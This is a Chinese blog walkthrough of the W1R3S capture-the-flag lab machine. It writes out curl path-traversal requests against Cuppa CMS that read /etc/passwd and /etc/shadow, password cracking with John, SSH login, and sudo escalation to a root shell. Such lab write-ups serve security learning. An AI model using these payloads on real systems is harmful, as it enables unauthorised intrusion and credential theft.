w1r3s靶机

最新推荐文章于 2024-08-27 15:58:06 发布
最新推荐文章于 2024-08-27 15:58:06 发布
阅读量319 收藏 4
点赞数 5
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/141035453
版权

1.信息收集

开放了四个端口分别是21、22、80、3306

目录扫描

访问web服务,拼接扫描出来的目录/administrator/,点击next,发现cuppa cms

搜索历史漏洞

searchsploit -m php/webapps/25971.txt

http://192.168.219.138/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd 没东西

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.219.138/administrator/alerts/alertConfigField.php

远程下载

发现了w1r3s用户,尝试能不能获得密码

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.219.138/administrator/alerts/alertConfigField.php

使用john破解,保存到txt文件

john password.txt

ftp尝试匿名登录

anonymous,密码为空

2.gets hell

ssh远程连接,只有w1r3s可以登录

ssh w1r3s@192.168.219.138

3.提权

sudo -l

echo '/bin/bash' >> root.sh

chmod +x root.sh

sudo ./root.sh

pingyao周杰伦
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
w1r3s 靶机学习
m0_63416413的博客
04-09 1262
w1r3s靶机学习,随手记录,参照B站RedTeamNotes的视频学习,红笔老登🤤
W1R3S靶机全通详细教程
observer的博客
07-30 1111
W1R3S靶机全通详细教程
W1R3S靶机渗透
2202_75361164的博客
04-16 472
进入FTP 中,首先就要使用binary转换成二进制模式,防止文件下载出错。, 经过处理后得到的文本信。
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 1784
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
w1r3s--靶机实操详解
qq_61802750的博客
08-05 515
把localhost指向我们的kali,再做一个实验,也许localhost不允许指定非本机ip,指向靶机ip可能不行,所以我们再创建一个域名来进行访问。看到已经列出了passwd的内容,每一条用户数据的第二段都是X,证明密码是以哈希的方式存在了shadow文件中,我们去找shadow文件。下面的字符,我们通过观察可以发现,它是上下颠倒加上前后倒序,kali里没有工具可以解密,我们可以百度进行查询。如果创建的域名可以访问的话,而localhost不行,那就是现在kali的环境不允许这样操作了。
w1r3s靶机实战
braty_的博客
05-22 214
多次尝试才发现这个网站并没有安装在cuppa的目录下,而是在administrator,多次拼接才得到回显,,但是没出现我们想要的。查看用户密码的hash值,存到 pass.hash 利用 john工具进行破解。发现一个安装页面,并且发现了cms,为了避免对服务器产生影响,先尝试cms。发现能用sudo权限干所有事情,直接 /bin/bash。发现传参修改为post模式就正常了。成功拿到两个账密,ssh登录。发现ftp可以匿名登陆。将文件依次拷贝至本地。没啥内容,直接扫目录。发现路径,,尝试拼接。
w1R3s靶机work_through
m0_57474995的博客
04-29 139
现在尝试一下能不能包含远程文件拿个shell 本地python3 -m http.server起一个http服务,放了一个shell.txt 但是尝试包含了几次,页面没反应,日志上也没有来自靶机的访问记录。看样子是行不通了。 那只能包含/etc/shadow来爆破密码了 An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data
打靶:vulnhub中的w1R3S
qq_73865998的博客
04-03 1933
复现视频:【「红队笔记」靶机精讲:W1R3S 1.0.1 - 渗透测试思路为王,细节多到即使对于纯萌新也能无感入圈。红队笔记(一个很宝藏的up主)。
渗透靶场之W1R3S
m0_56190544的博客
06-26 487
完整的解析了vulnhub靶场中的W1R3S的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 330
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1489
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 1251
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
服务器远程管理
m0_64827698的博客
08-26 522
SSH两种级别的安全认证:基于口令(口令在网络上传播,易受中间人攻击),基于密钥(传公钥,公钥是否相同,公钥加密质询,私钥解密)(密钥不在网络上传)2.启用服务services.msc(telnet)/配置远程桌面服务gpedit.msc(rdp)/使⽤SSH,你可以把所有传输的数据进⾏加密,这样“中间 ⼈”这种攻击⽅式就不可能实现了。实验总结:在windows开启telnet服务(2019不支持),RDP服务,SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法,以优化安全性和性能。
系统编程 网络 http协议
qq_69971969的博客
08-24 788
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
33.python socket
最新发布
笔生花的博客
08-27 1110
python socket 心跳包 数据包
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值